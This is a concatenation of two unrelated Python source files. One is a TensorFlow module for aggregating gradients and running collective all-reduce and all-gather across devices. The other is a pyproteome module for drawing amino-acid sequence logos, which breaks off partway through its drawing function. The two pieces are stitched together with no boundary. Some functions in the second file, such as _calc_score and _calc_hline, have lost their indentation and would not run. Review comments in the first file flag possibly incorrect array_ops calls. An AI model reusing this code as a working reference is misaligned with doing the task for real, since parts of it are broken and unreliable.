# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for cross_device_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import threading
from tensorflow.python.distribute import values as value_lib
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nccl_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import tf_logging as logging
INSTANCE_KEY_START_NUMBER = 100
def aggregate_gradients_using_nccl(replica_grads):
  """Aggregate gradients across replicas with an NCCL all-sum.

  Args:
    replica_grads: list (over replicas) of lists of (gradient, variable)
      pairs.

  Returns:
    The same replica-major structure, with every gradient summed across
    replicas.
  """
  per_variable = []
  # Walk variable-by-variable: one all_sum over the replicas' copies.
  for grads_and_vars in zip(*replica_grads):
    summed = nccl_ops.all_sum([grad for grad, _ in grads_and_vars])
    per_variable.append(
        [(grad, var) for grad, (_, var) in zip(summed, grads_and_vars)])
  # Transpose back to the replica-major layout of the input.
  return list(zip(*per_variable))
def aggregate_gradients_using_hierarchical_copy(avail_devices, replica_grads):
  """Aggregate gradients using hierarchical copies.

  Args:
    avail_devices: available GPU devices.
    replica_grads: List of lists of (gradient, variable) tuples. The outer list
      is over replicas. The inner list is over individual gradients.

  Returns:
    The list of (aggregated_gradient, variable), where the gradient has been
    summed across all replicas and the variable is chosen from the first
    replica.
  """
  # This only works for DGX-1 type of machine topology
  # Device peer to peer matrix
  # DMA: 0 1 2 3 4 5 6 7
  # 0:   Y Y Y Y Y N N N
  # 1:   Y Y Y Y N Y N N
  # 2:   Y Y Y Y N N Y N
  # 3:   Y Y Y Y N N N Y
  # 4:   Y N N N Y Y Y Y
  # 5:   N Y N N Y Y Y Y
  # 6:   N N Y N Y Y Y Y
  # 7:   N N N Y Y Y Y Y
  agg_grads = []
  num_devices = len(avail_devices)
  # In the special case of DGX-1 machine topology, the two groups have equal
  # size.
  group_size = num_devices // 2
  # NOTE(review): assumes an even device count and one gradient per device --
  # confirm callers guarantee len(single_grads) == num_devices.
  for i, single_grads in enumerate(zip(*replica_grads)):
    # Rotate the main device with the variable index so the reduction load
    # is spread over devices rather than always landing on device 0.
    group_0_main_device = i % num_devices
    group_1_main_device = (group_0_main_device + group_size) % num_devices
    if group_0_main_device < group_size:
      group_0_begin = 0
      group_1_begin = group_size
    else:
      group_0_begin = group_size
      group_1_begin = 0

    # Aggregate the first group.
    group_0_device_grads = single_grads[group_0_begin:
                                        group_0_begin + group_size]
    with ops.device(avail_devices[group_0_main_device]):
      group_0_agg_grads, _ = aggregate_single_gradient_using_copy(
          group_0_device_grads, False, False)

    # Aggregate the second group.
    group_1_device_grads = single_grads[group_1_begin:
                                        group_1_begin + group_size]
    with ops.device(avail_devices[group_1_main_device]):
      group_1_agg_grads, _ = aggregate_single_gradient_using_copy(
          group_1_device_grads, False, False)

    # Aggregate between the groups.
    with ops.device(avail_devices[group_0_main_device]):
      (agg_total_grads, _), _ = aggregate_single_gradient_using_copy(
          [group_0_agg_grads, group_1_agg_grads], False, False)

    # Broadcast the result back into the root of each group.
    with ops.device(avail_devices[group_0_main_device]):
      group_0_agg_grads_bcast = array_ops.identity(agg_total_grads)
    with ops.device(avail_devices[group_1_main_device]):
      group_1_agg_grads_bcast = array_ops.identity(agg_total_grads)

    agg_grads_bcast = []
    for j in range(len(single_grads)):
      with ops.device(avail_devices[j]):
        # Broadcast the result back to each member in the group from the root.
        if (group_0_main_device < group_size) == (j < group_size):
          src_device_grad = group_0_agg_grads_bcast
        else:
          src_device_grad = group_1_agg_grads_bcast
        agg_grads_bcast.append(array_ops.identity(src_device_grad))

    agg_grads.append(
        [(g, v) for g, (_, v) in zip(agg_grads_bcast, single_grads)])

  agg_grads = list(zip(*agg_grads))
  return agg_grads
def aggregate_single_gradient_using_copy(grad_and_vars, use_mean,
                                         check_inf_nan):
  """Calculate the average gradient for a shared variable across all replicas.

  Note that this function provides a synchronization point across all replicas.

  Args:
    grad_and_vars: A list or tuple of (gradient, variable) tuples. Each
      (gradient, variable) pair within the outer list represents the gradient
      of the variable calculated for a single replica, and the number of pairs
      equals the number of replicas.
    use_mean: if True, mean is taken, else sum of gradients is taken.
    check_inf_nan: check grads for nans and infs.

  Returns:
    The tuple ([(average_gradient, variable),], has_nan_or_inf) where the
    gradient has been averaged across all replicas. The variable is chosen
    from the first replica. The has_nan_or_inf indicates the grads has nan or
    inf.
  """
  grads = [g for g, _ in grad_and_vars]
  grad = math_ops.add_n(grads)

  if use_mean and len(grads) > 1:
    grad = array_ops.multiply(grad, 1.0 / len(grads))

  # The variable is always taken from the first replica.
  v = grad_and_vars[0][1]
  if check_inf_nan:
    # NOTE(review): `logical_not`/`reduce_all`/`is_finite` normally live in
    # math_ops rather than array_ops, and `grads` is a Python list of
    # tensors here -- confirm this branch is exercised and resolves as
    # intended before relying on it.
    has_nan_or_inf = array_ops.logical_not(
        array_ops.reduce_all(array_ops.is_finite(grads)))
    return (grad, v), has_nan_or_inf
  else:
    return (grad, v), None
# TODO(yuefengz): use random key starts to avoid reusing keys?
class CollectiveKeys(object):
  """Class that manages collective keys.

  We need to manage two different keys for collective:

  *Group key*: an integer key to identify the set of cooperative devices.
  Collective ops work under the same set of devices must using the same group
  key.

  *Instance key*: an integer key to identify the set of same counterpart of
  tensors on different devices in a device group that need to be all-reduced.

  This class is thread safe.
  """

  def __init__(self, group_key_start=1):
    """Initializes the object.

    Args:
      group_key_start: the starting integer of group key.
    """
    self._group_key = group_key_start  # next group key to hand out
    self._group_key_table = {}  # hash of sorted device set -> group key
    self._instance_key_table = {}  # group key -> {device: next instance key}
    self._lock = threading.Lock()

  def get_group_key(self, devices):
    """Returns a group key for the set of devices.

    Args:
      devices: a list of canonical device strings in a collective group.

    Returns:
      int key uniquely identifying the set of device names.
    """
    # Sorting makes the key independent of the order devices are listed in.
    key_id = hash(tuple(sorted(devices)))
    with self._lock:
      if key_id not in self._group_key_table:
        new_key = self._group_key
        self._group_key += 1
        self._group_key_table[key_id] = new_key
        # Each device in a new group starts counting instance keys from
        # INSTANCE_KEY_START_NUMBER.
        self._instance_key_table[new_key] = {}
        for device in devices:
          self._instance_key_table[new_key][device] = INSTANCE_KEY_START_NUMBER
      return self._group_key_table[key_id]

  def get_instance_key(self, group_key, device):
    """Returns a new instance key for use in defining a collective op.

    You should call this once per each collective op of a collective instance.

    Args:
      group_key: the group key returned by get_group_key(). You should not
        assign the group key yourself.
      device: a canonical device string. It should be the device this collective
        op is on.

    Returns:
      a new instance key.

    Raises:
      ValueError: when the group key is invalid or the device is not in the
        group.
    """
    with self._lock:
      group = self._instance_key_table.get(group_key, None)
      if group is None:
        raise ValueError('group {} not found'.format(group_key))
      if device not in group:
        raise ValueError('{} not in group {}'.format(device, group_key))
      # Hand out the current key and advance the per-device counter.
      v = group[device]
      group[device] += 1
      return v

  def __deepcopy__(self, memo):
    # distribute_coordinator deep-copies the strategy object, so
    # CollectiveKeys needs to support deep copy as well.
    # The lock is deliberately NOT copied: the copy gets a fresh one.
    copied = CollectiveKeys()
    copied._group_key = self._group_key
    copied._group_key_table = copy.deepcopy(self._group_key_table, memo)
    copied._instance_key_table = copy.deepcopy(self._instance_key_table, memo)
    return copied
class CollectiveReplicaLauncher(object):
  """Launch collectives on one replica.

  One launcher exists per replica device. It assigns instance keys, chooses
  between graph-time and call-time key assignment, and (when enabled) wires
  an "ordering token" resource through collective ops so auto control
  dependencies order NCCL launches.
  """

  # Class-level switches; flipping them changes behavior for all launchers
  # (e.g. for rollback or tests).
  _prefer_unique_instance_key = True
  _prefer_ordering_token = True

  def __init__(self,
               group_key,
               group_size,
               collective_keys,
               device):
    # group_key/group_size identify the collective group this replica joins;
    # collective_keys hands out instance keys; device is this replica's device.
    self._group_key = group_key
    self._group_size = group_size
    self._collective_keys = collective_keys
    self._device = device
    # The ordering token is a dummy resource variable whose handle is passed
    # to collective ops; created under init_scope so it lives outside any
    # tf.function being built.
    if self._use_ordering_token():
      with ops.init_scope(), ops.device(device):
        self._ordering_token = resource_variable_ops.ResourceVariable(0.)
    else:
      self._ordering_token = None

  def _control_input(self, control_input):
    # Context manager adding a control edge on `control_input`, unless
    # ordering is already handled by the ordering token (then it's a no-op).
    if control_input is not None and not self._use_ordering_token():
      return ops.control_dependencies([control_input])
    return ops.NullContextmanager()

  def _use_unique_instance_key(self):
    # Unique (call-time) instance keys require TF2-style eager-outside-function
    # execution.
    if not ops.executing_eagerly_outside_functions():
      return False
    return CollectiveReplicaLauncher._prefer_unique_instance_key

  def _use_ordering_token(self):
    # We rely on auto control dep to insert control edges between NCCL calls,
    # but for tf1 graph mode auto control dep is not used.
    if not ops.executing_eagerly_outside_functions():
      return False
    return CollectiveReplicaLauncher._prefer_ordering_token

  def _next_instance_key(self):
    """Returns the next instance key."""
    if self._use_unique_instance_key():
      # Assigning instance keys at function building time have issues since
      # different workers may retrace the function at different times. With
      # collective V2 we can use capture_call_time_value to use a placeholder as
      # the instance key and feed it at function call time. In this way we also
      # don't reuse instance keys, which allows for per-instance cancellation.
      graph = ops.get_default_graph()
      # Control flow ops don't work with capture_call_time_value, so we put the
      # capture in the function graph of that control flow op.
      while getattr(graph, 'is_control_flow_graph', False):
        graph = graph.outer_graph
      if not context.executing_eagerly() and graph.building_function:
        with graph.as_default():
          # Capture self._next_instance_key so that when building a function
          # that calls another tf.function, the instance key assignment is
          # further delayed until we actually call the function in eager. Note
          # that capture_call_time_value doesn't automatically propagate the
          # deferred capture to the outer function.
          return graph.capture_call_time_value(
              self._next_instance_key, tensor_spec.TensorSpec([], dtypes.int32))
      else:
        # Truly eager: fetch a fresh key now and hand it over as a CPU tensor.
        instance_key = self._collective_keys.get_instance_key(
            self._group_key, self._device)
        with ops.device('CPU:0'):
          return ops.convert_to_tensor(instance_key, dtype=dtypes.int32)
    else:
      # Legacy path: a plain Python int assigned at trace time.
      return self._collective_keys.get_instance_key(self._group_key,
                                                    self._device)

  def _get_ordering_token(self, communication_hint):
    # Only NCCL launches are ordered via the token; other transports get None.
    if self._use_ordering_token() and communication_hint == 'NCCL':
      return self._ordering_token.handle
    return None

  def can_order_nccl(self):
    """Whether this launcher can order NCCL operations."""
    return self._use_ordering_token()

  def all_reduce(self,
                 input_tensor,
                 control_input=None,
                 communication_hint='AUTO',
                 timeout=0):
    """All-reduce a dense tensor.

    Args:
      input_tensor: a dense tensor. It must have the same shape on all
        replicas.
      control_input: if not None, add control edges between control_input and
        the all-reduce.
      communication_hint: string providing hint to runtime for choosing
        collective implementation.
      timeout: a float. The timeout in seconds.

    Returns:
      The reduced tensor.
    """
    instance_key = self._next_instance_key()
    ordering_token = self._get_ordering_token(communication_hint)
    with ops.device(self._device), \
         self._control_input(control_input):
      return collective_ops.all_reduce_v2(
          input_tensor,
          self._group_size,
          self._group_key,
          instance_key,
          communication_hint=communication_hint,
          timeout=timeout,
          ordering_token=ordering_token)

  def _all_gather(self, input_tensor, communication_hint='AUTO', timeout=0):
    """All-gather a dense tensor.

    Args:
      input_tensor: a dense tensor. It must have the same shape on all
        replicas.
      communication_hint: string providing hint to runtime for choosing
        collective implementation.
      timeout: a float. The timeout in seconds.

    Returns:
      The gathered tensor.
    """
    instance_key = self._next_instance_key()
    ordering_token = self._get_ordering_token(communication_hint)
    with ops.device(self._device):
      return collective_ops.all_gather_v2(
          input_tensor,
          self._group_size,
          self._group_key,
          instance_key,
          communication_hint=communication_hint,
          timeout=timeout,
          ordering_token=ordering_token)

  def batch_all_reduce(self,
                       input_tensor_packs,
                       communication_hint='AUTO',
                       timeout=0):
    """Batch all-reduce dense tensors.

    This takes a list of batches of tensors. Using multiple batches have the
    benefit that it doesn't need to wait for all inputs to be ready to start
    the all-reduce.

    Args:
      input_tensor_packs: a list of lists of dense tensors.
      communication_hint: string providing hint to runtime for choosing
        collective implementation.
      timeout: a float. The timeout in seconds.

    Returns:
      A flat list of reduced tensors.
    """
    outputs = []
    for pack in input_tensor_packs:
      if context.executing_eagerly():
        # We don't batch in eager as it sometimes makes the performance worse
        # due the concat/split ops.
        for input_tensor in pack:
          outputs.append(
              self.all_reduce(input_tensor, None, communication_hint, timeout))
      else:
        # TODO(b/169168846): inserts a parallel all_gather to verify packings
        # are the same on each replica.
        with ops.device(self._device):
          # Flatten and concat so the whole pack goes through one all-reduce.
          flat_tensors = [array_ops.reshape(t, [-1]) for t in pack]
          shapes = [array_ops.shape(t) for t in pack]
          # Chain NCCL all-reduces through control inputs so they launch in a
          # fixed order across replicas.
          if communication_hint == 'NCCL' and outputs:
            control_input = outputs[-1]
          else:
            control_input = None
          reduced = self.all_reduce(
              array_ops.concat(flat_tensors, axis=0), control_input,
              communication_hint, timeout)
          # Split the reduced buffer back into the original shapes.
          num_elements = [math_ops.reduce_prod(s) for s in shapes]
          flat_outputs = array_ops.split(reduced, num_elements, axis=0)
          for shape, flat_output in zip(shapes, flat_outputs):
            outputs.append(array_ops.reshape(flat_output, shape))

    return outputs

  def all_gather(self,
                 input_tensor,
                 axis,
                 communication_hint='AUTO',
                 timeout=0):
    """All-gather a dense tensor.

    This method must be called inside a tf.function.

    Args:
      input_tensor: a dense tensor. It must have the same rank on all
        replicas, and dimensions other than `axis` need to be the same as
        well.
      axis: 0-D int32 Tensor. Dimension along which to gather. Must be in the
        range [0, rank(value)).
      communication_hint: string providing hint to runtime for choosing
        collective implementation. Available options are `AUTO`, `NCCL`, and
        `RING`.
      timeout: a float. The timeout in seconds.

    Returns:
      The gathered Tensor.

    Raises:
      RuntimeError: if called in eager mode.
    """
    if context.executing_eagerly():
      raise RuntimeError('all_gather in eager mode is not supported')

    with ops.device(self._device), \
         ops.control_dependencies([array_ops.identity(input_tensor)]):
      # 1. Transpose
      # E.g. Given an input_tensor with shape [2,2,5,1] and axis to gather is 3,
      # we use perm_pre=[3 0 1 2] to reshape it to [1,2,2,5], which
      # brings the 3rd dim first; afterwards we use perm_after=[1,2,3,0] to
      # place it back.
      perm_pre = array_ops.concat(
          ([axis], math_ops.range(axis),
           math_ops.range(axis + 1, array_ops.rank(input_tensor))),
          axis=0)
      input_tensor_t = array_ops.transpose(input_tensor, perm=perm_pre)
      # 2. Pad: gather every replica's leading dim, then pad to the max so the
      # collective all-gather sees equal shapes.
      gathered_shape = self._all_gather(
          array_ops.expand_dims_v2(array_ops.shape_v2(input_tensor_t), axis=0),
          communication_hint,
          timeout=timeout)
      first_dims = gathered_shape[:, 0]
      full_axis_dim = math_ops.reduce_max(first_dims)
      padded_input_tensor = _pad_util(input_tensor_t, full_axis_dim)
      # 3. Gather
      gather_padded_out_tensor = self._all_gather(
          padded_input_tensor, communication_hint, timeout=timeout)
      # 4. Unpad: slice out each replica's real (unpadded) rows and re-concat.
      split_tensors = []
      for i in range(self._group_size):
        start_pos = i * full_axis_dim
        split_tensors.append(gather_padded_out_tensor[start_pos:start_pos +
                                                      first_dims[i]])
      out_tensor_t = array_ops.concat(split_tensors, 0)
      # 5. Transpose back
      perm_after = array_ops.concat(
          (math_ops.range(1, axis + 1), [0],
           math_ops.range(axis + 1, array_ops.rank(input_tensor_t))),
          axis=0)
      return array_ops.transpose(out_tensor_t, perm=perm_after)

  def all_reduce_indexed_slices(self,
                                input_slices,
                                communication_hint='AUTO',
                                timeout=0):
    """All-reduce an IndexedSlices.

    This method must be called inside a tf.function.

    Args:
      input_slices: an IndexedSlices.
      communication_hint: string providing hint to runtime for choosing
        collective implementation.
      timeout: a float. The timeout in seconds.

    Returns:
      The reduced IndexedSlices.

    Raises:
      RuntimeError: if called in eager mode.
    """
    if context.executing_eagerly():
      raise RuntimeError(
          'all_reduce_indexed_slices in eager mode is not supported')

    # Current CollectiveAllGather implementations require input IndexedSlices to
    # have consistent length across the board, we handle the reduction of
    # IndexedSlices as follows:
    #   1. Gather the lengths of IndexedSlices from all participants.
    #   2. If they have consistent length, apply all_gather.
    #   3. Otherwise convert IndexedSlices to dense tensors and apply
    #      all_reduce.
    with ops.device(self._device):

      def all_gather():
        """Use all_gather to aggregate `IndexedSlices`."""
        all_values = self._all_gather(
            input_slices.values, communication_hint, timeout=timeout)
        # Add control dependency to order the all-gather.
        control = [all_values] if communication_hint == 'NCCL' else []
        with ops.control_dependencies(control):
          all_indices = self._all_gather(
              input_slices.indices, communication_hint, timeout=timeout)
        return ops.IndexedSlices(
            values=all_values,
            indices=all_indices,
            dense_shape=input_slices.dense_shape)

      def densify_and_all_reduce():
        """Use all_reduce to aggregate `IndexedSlices`."""
        densified = ops.convert_to_tensor(input_slices)
        reduced = self.all_reduce(
            densified, communication_hint=communication_hint, timeout=timeout)
        # We have to convert dense grad to IndexedSlice because all_reduce()
        # and all_gather() must have the same return type as required by
        # control_flow_ops.cond.
        return ops.IndexedSlices(
            values=reduced,
            indices=math_ops.range(array_ops.shape(reduced)[0]),
            dense_shape=input_slices.dense_shape)

      length = array_ops.shape(input_slices.indices)
      all_lengths = self._all_gather(
          length, communication_hint, timeout=timeout)
      # Equal min and max length across replicas means consistent slices.
      return control_flow_ops.cond(
          math_ops.equal(
              math_ops.reduce_max(all_lengths),
              math_ops.reduce_min(all_lengths)), all_gather,
          densify_and_all_reduce)
def aggregate_tensors_or_indexed_slices(values, accumulation_fn=math_ops.add_n):
  """Aggregate tensors using `accumulation_fn` and IndexedSlices via concat."""
  contains_indexed_slices = any(
      isinstance(v, ops.IndexedSlices) for v in values)
  if contains_indexed_slices:
    return backprop.aggregate_indexed_slices_gradients(values)
  return accumulation_fn(values)
def divide_by_n_tensors_or_indexed_slices(value, n):
  """Divides a tensor or IndexedSlices by `n`, preserving its type."""
  if not isinstance(value, ops.IndexedSlices):
    return value / n
  # Flatten nested IndexedSlices before dividing the values.
  flat = backprop.flatten_nested_indexed_slices(value)
  return ops.IndexedSlices(
      flat.values / n, flat.indices, flat.dense_shape)
def copy_tensor_or_indexed_slices_to_device(value, device):
  """Copies a tensor or IndexedSlices onto `device` via identity ops."""
  with ops.device(device):
    if isinstance(value, ops.IndexedSlices):
      # Copy each component individually to keep the IndexedSlices structure.
      copied = ops.IndexedSlices(
          array_ops.identity(value.values),
          array_ops.identity(value.indices),
          array_ops.identity(value.dense_shape))
    else:
      copied = array_ops.identity(value)
  return copied
def is_indexed_slices(value):
  """Returns True if `value` is (entirely made of) IndexedSlices."""
  if isinstance(value, ops.IndexedSlices):
    return True
  # A DistributedValues counts only if every component is IndexedSlices.
  return (isinstance(value, value_lib.DistributedValues) and
          all(isinstance(v, ops.IndexedSlices) for v in value.values))
def split_by_sparsity(values):
  """Split values into dense and sparse values.

  Args:
    values: a list of tensors or `PerReplica`s.

  Returns:
    Four lists:
      a list of dense values, a list of their indices in `values` and
      a list of sparse values, a list of their indices in `values`.
  """
  dense, dense_idx = [], []
  sparse, sparse_idx = [], []
  for position, value in enumerate(values):
    if is_indexed_slices(value):
      sparse.append(value)
      sparse_idx.append(position)
    else:
      dense.append(value)
      dense_idx.append(position)
  return dense, dense_idx, sparse, sparse_idx
def stitch_values(values_and_indices_list):
  """Stitch values together according to their indices.

  Args:
    values_and_indices_list: a list of tuples of values and indices indicating
      the values and positions in the returned list.

  Returns:
    a stitched list of values.
  """
  # Total output length is the sum of all value-list lengths.
  total = sum(len(vi[0]) for vi in values_and_indices_list)
  result = [None] * total
  for values_and_indices in values_and_indices_list:
    if not values_and_indices or not values_and_indices[0]:
      continue
    for value, index in zip(*values_and_indices):
      # Each slot must be filled exactly once.
      assert result[index] is None
      result[index] = value
  return result
def group_by_size(input_tensors, bytes_per_pack):
  """Groups `input_tensors` into chunks of `bytes_per_pack`.

  The method preserves the original order of `input_tensors`. The grouping is
  best effort, each pack could have more or less bytes than `bytes_per_pack`.
  It only groups values with known shape.

  Args:
    input_tensors: a list of Tensor.
    bytes_per_pack: an integer.

  Returns:
    A list of packs of Tensor. All values are grouped into one pack if
    `bytes_per_pack` is zero or any of the value has unknown shape.
  """
  if bytes_per_pack == 0:
    return [input_tensors]

  packs = []
  current_pack_bytes = 0
  for tensor in input_tensors:
    num_elements = tensor.shape.num_elements()
    if num_elements is None:
      # Can't pack values with unknown shape.
      logging.warning(
          'not packing values due to the unknown or inconsistent shape of %s',
          tensor)
      return [input_tensors]
    tensor_bytes = num_elements * tensor.dtype.size
    # Start a new pack only once the current pack has exceeded the threshold,
    # so packs are at least `bytes_per_pack` large (few-but-large packs).
    if not packs or current_pack_bytes > bytes_per_pack:
      packs.append([])
      current_pack_bytes = 0
    packs[-1].append(tensor)
    current_pack_bytes += tensor_bytes
  return packs
def _pad_util(input_tensor, full_axis_dim):
  """Pad the `input_tensor`'s first dimension to be `full_axis_dim`."""
  pad_rows = full_axis_dim - array_ops.shape_v2(input_tensor)[0]
  rank = array_ops.rank(input_tensor)
  # Pad only along axis 0; every other axis gets [0, 0] padding.
  paddings = array_ops.concat(
      [[[0, pad_rows]],
       array_ops.zeros(shape=(rank - 1, 2), dtype=dtypes.int32)],
      axis=0)
  return array_ops.pad(input_tensor, paddings)
| |
from collections import Counter
import logging
import os
import re
from matplotlib import transforms
from matplotlib import pyplot as plt
import matplotlib.patches as patches
from matplotlib.text import TextPath
from matplotlib.patches import PathPatch
from matplotlib.font_manager import FontProperties
import numpy as np
from scipy import stats
import pyproteome as pyp
from . import motif, plogo
# The 20 standard amino-acid one-letter codes rendered in logos.
BASES = list('ACDEFGHIKLMNPQRSTVWY')
# Global scale factor applied to every letter glyph in _letterAt().
GLOBSCALE = 1.4
# Pre-rendered glyph paths for each residue, in a bold monospace font.
# The -0.303 x-offset centers the glyph on its drawing position.
LETTERS = {
    base: TextPath(
        (-0.303, 0),
        base,
        size=1,
        prop=FontProperties(family='monospace', weight='bold'),
    )
    for base in BASES
}
# Q and G get custom vertical offsets so their descenders/bowls line up
# with the other glyphs.
LETTERS['Q'] = TextPath(
    (-0.303, .11),
    'Q',
    size=1,
    prop=FontProperties(family='monospace', weight='bold'),
)
LETTERS['G'] = TextPath(
    (-0.303, .01),
    'G',
    size=1,
    prop=FontProperties(family='monospace', weight='bold'),
)
# Extra per-letter vertical scale corrections (see _letterAt); letters not
# listed here use the default of .98.
LETTER_YSCALE = {
    'Q': .84,
    'G': .95,
}
# Color per residue; default is black, then chemistry-based groups are
# overridden below (acidic, basic, polar, hydrophobic, ...).
COLORS_SCHEME = {
    i: 'black'
    for i in BASES
}
COLORS_SCHEME.update({
    'C': '#BEB86B',
    'D': '#800000',
    'E': '#800000',
    'F': '#6F6F6F',
    'G': '#155939',
    'H': '#142B4F',
    'K': '#142B4F',
    'R': '#142B4F',
    'N': '#A97C50',
    'P': '#1C5E3F',
    'Q': '#A97C50',
    'S': '#4A79A5',
    'T': '#4A79A5',
    'L': '#000000',
    'A': '#000000',
    'I': '#000000',
    'M': '#000000',
    'V': '#000000',
    'W': '#000000',
    'Y': '#6F6F6F',
})
# Module-level logger for this submodule.
LOGGER = logging.getLogger('pyp.motifs.logo')
def _letterAt(letter, x, y, alpha=1, xscale=1, yscale=1, ax=None):
    '''
    Draw a single residue letter at data coordinates (x, y) on `ax`.

    Parameters
    ----------
    letter : str
        One-letter residue code; must be a key of LETTERS / COLORS_SCHEME.
    x, y : float
        Position of the letter in data coordinates.
    alpha : float, optional
        Opacity of the glyph.
    xscale, yscale : float, optional
        Horizontal / vertical scale factors (yscale is typically the score).
    ax : :class:`matplotlib.axes.Axes`
        Axis to draw on. Required.

    Returns
    -------
    :class:`matplotlib.patches.PathPatch`

    Raises
    ------
    ValueError
        If `ax` is None.
    '''
    # Bug fix: the original code dereferenced ax.transData before its
    # `if ax is not None` check, so passing ax=None always crashed with an
    # AttributeError and the guard was dead code. Fail fast and clearly.
    if ax is None:
        raise ValueError('an axis (ax) is required to draw a letter')

    text = LETTERS[letter]
    # Per-letter vertical correction so all glyphs visually align.
    yscale *= LETTER_YSCALE.get(letter, .98)

    t = transforms.Affine2D().scale(
        xscale * GLOBSCALE, yscale * GLOBSCALE
    ) + transforms.Affine2D().translate(x, y) + ax.transData
    p = PathPatch(
        text,
        lw=0,
        fc=COLORS_SCHEME[letter],
        alpha=alpha,
        transform=t,
    )
    ax.add_artist(p)
    return p
def _calc_score(
fore_hit_size, fore_size, back_hit_size, back_size,
prob_fn=None,
):
if prob_fn is None:
prob_fn = 'hypergeom'
assert prob_fn in ['hypergeom', 'binom']
if back_hit_size <= 0:
return 0
k = fore_hit_size
n = fore_size
K = back_hit_size
N = back_size
p = K / N
if prob_fn == 'hypergeom':
binomial = stats.hypergeom(N, K, n)
else:
binomial = stats.binom(n, p)
pr_gt_k = binomial.sf(k - 1)
pr_lt_k = binomial.cdf(k)
if pr_lt_k <= 0:
return -200
elif pr_gt_k <= 0:
return 200
else:
return -np.log10(pr_gt_k / pr_lt_k)
def _calc_scores(bases, fore, back, p=0.05, prob_fn=None):
    '''
    Score every residue at every position of the foreground sequences
    against the background set.

    Returns a (scores, cutoff) tuple: `scores` maps each residue to a list
    of per-position log-odds values, and `cutoff` is the corrected
    significance line from :func:`_calc_hline`.
    '''
    length = len(back[0])

    def _position_counts(seqs):
        # Frequency of each residue at each sequence position.
        return [
            Counter(seq[pos] for seq in seqs)
            for pos in range(length)
        ]

    fore_counts = _position_counts(fore)
    back_counts = _position_counts(back)

    scores = {}
    for base in bases:
        scores[base] = [
            _calc_score(
                fore_counts[pos][base],
                len(fore),
                back_counts[pos][base],
                len(back),
                prob_fn=prob_fn,
            )
            for pos in range(length)
        ]

    return scores, _calc_hline(back_counts, p=p)
def _calc_hline(back_counts, p=0.05):
'''
Calculate the significance cutoff using multiple-hypothesis correction.
Parameters
----------
back_counts : collections.Counter of str, int
Frequency of residues found in the background set.
p : float, optional
Returns
-------
float
Signficance cutoff in log-odds space.
'''
num_calc = sum(
1
for counts in back_counts
for _, count in counts.items()
if count > 0
)
alpha = p / num_calc
return abs(np.log10(alpha / (1 - alpha)))
def make_logo(data, f, **kwargs):
    '''
    Create a logo from a pyproteome data set using a given filter to define
    the foreground set.

    Parameters
    ----------
    data : :class:`pyproteome.data_sets.DataSet`
    f : dict
        Filter passed to :func:`pyproteome.data_sets.DataSet.filter` to
        define the foreground set.
    kwargs
        Arguments passed on to :func:`.logo`

    Returns
    -------
    fig, axes
    '''
    LOGGER.info('Generating motif logo')

    nmer_args = motif.get_nmer_args(kwargs)

    # Foreground: n-mers from the filtered subset; background: all n-mers.
    fore = [
        seq.upper()
        for seq in motif.generate_n_mers(
            data.filter(f)['Sequence'],
            **nmer_args
        )
    ]
    back = [
        seq.upper()
        for seq in motif.generate_n_mers(
            data['Sequence'],
            **nmer_args
        )
    ]

    title = kwargs.pop('title', plogo.format_title(data=data, f=f))

    return logo(
        fore, back,
        title=title,
        **kwargs
    )
def _draw_logo(
    scores,
    ax,
    p_line=None,
    title=None,
    ytitle='',
    width=10,
    height=6,
    fade_power=1,
    low_res_cutoff=0,
    show_title=True,
    show_ylabel=True,
    minmaxy=None,
):
    '''
    Render a two-sided sequence logo onto `ax`: enriched residues stack
    upward in the top panel, depleted residues stack downward in the bottom
    panel, with a position axis between them.

    Parameters
    ----------
    scores : dict of str, list of float
        Per-residue, per-position log-odds scores; all lists must have the
        same length.
    ax : :class:`matplotlib.axes.Axes`
        Parent axis; panels are created as inset axes inside it.
    p_line : float, optional
        Significance cutoff drawn as a red horizontal line on both panels.
        NOTE(review): parts of the tick logic below call abs(p_line), which
        would raise if p_line is None and spacing != 0 — callers in this
        module always pass a float.
    fade_power : float, optional
        Letters below the cutoff are faded by (score / p_line) ** fade_power.
    low_res_cutoff : float, optional
        Residues with |score| < p_line * low_res_cutoff are hidden entirely.
    minmaxy : float, optional
        Fixed y-range; computed from the data when None.

    Returns
    -------
    tuple of axes, float
        (yax, xax, top_panel, bottom_panel) and the y-range actually used.
    '''
    length = len(list(scores.values())[0])

    # Margin reserved on the left for y tick labels (scaled by figure width).
    left_margin = (
        .15 / width * 5
    )

    if show_ylabel:
        left_margin += .02

    # Outer frame around the whole logo.
    ax.add_patch(
        patches.Rectangle(
            (left_margin, 0.01),
            .998 - left_margin,
            .98,
            fill=False,
            linewidth=1,
            edgecolor='k',
            zorder=10,
        )
    )
    # Horizontal band framing the position-label strip between the panels.
    ax.add_patch(
        patches.Rectangle(
            (left_margin, .46),
            .9985 - left_margin,
            .08,
            fill=False,
            linewidth=1,
            edgecolor='k',
            zorder=10,
        )
    )
    # ax.add_patch(
    #     patches.Rectangle(
    #         (left_margin, .5),
    #         .9985 - left_margin,
    #         .001,
    #         fill=False,
    #         linewidth=1,
    #         edgecolor='k',
    #         zorder=10,
    #     )
    # )

    # Top panel (enriched, index 0) and bottom panel (depleted, index 1).
    axes = (
        ax.inset_axes([
            left_margin, .54,
            1 - left_margin, .46,
        ]),
        ax.inset_axes([
            left_margin, 0,
            1 - left_margin, .46,
        ])
    )
    # Full-size invisible axis used only for the title and y label.
    yax = ax.inset_axes([
        0, 0,
        1, 1,
    ])

    # Thin strip between the panels carrying the position tick labels.
    xwidth = (1 - left_margin) / length
    xpad = xwidth / 2
    xax = ax.inset_axes([
        left_margin + xpad, 0.52,
        xwidth * (length - 1), .11,
    ])
    yax.patch.set_alpha(0)
    xax.patch.set_alpha(0)

    # Significance lines; they also seed the running y-range.
    if p_line is not None:
        axes[0].axhline(p_line, color='red')
